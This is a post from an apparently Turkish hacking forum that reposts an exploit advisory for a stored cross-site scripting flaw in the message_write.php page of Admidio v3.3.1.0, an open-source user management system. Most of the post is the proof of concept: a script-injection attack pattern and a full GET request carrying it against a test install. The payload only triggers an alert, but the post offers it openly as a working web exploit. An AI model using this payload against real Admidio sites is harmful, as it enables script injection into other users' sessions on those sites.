Hoşgeldin Misafir

Admidio ADM - ’message_write.php’ XSS Inj.

./K3m4l1ST

22 Ocak 2019
580 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Kod:
==========================================================================================
# Exploit Title: Admidio ADM - ’message_write.php’ XSS Inj.
# Dork: N/A
# Date: 06-04-2019=
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.admidio.org/
# Software Link: https://sourceforge.net/projects/admidio/
# Version: v3.3.1.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Descr*iption: Admidio is a free open source user management system for websites of
  organizations and groups. The system has a flexible role model so that it’s possible to 
  reflect the structure and permissions of your organization.
===========================================================================================
# POC - XSS (Stored)
# Parameters : message_write.php
# Attack Pattern : ’--></style></scRipt><scRipt>alert(0x001EB1)</scRipt>
# GET Method : http://localhost/admidio3310/admidio/adm_program/modules/messages/messages_write.php?’“--></style></scRipt><scRipt>alert(0x001EB1)</scRipt>
===========================================================================================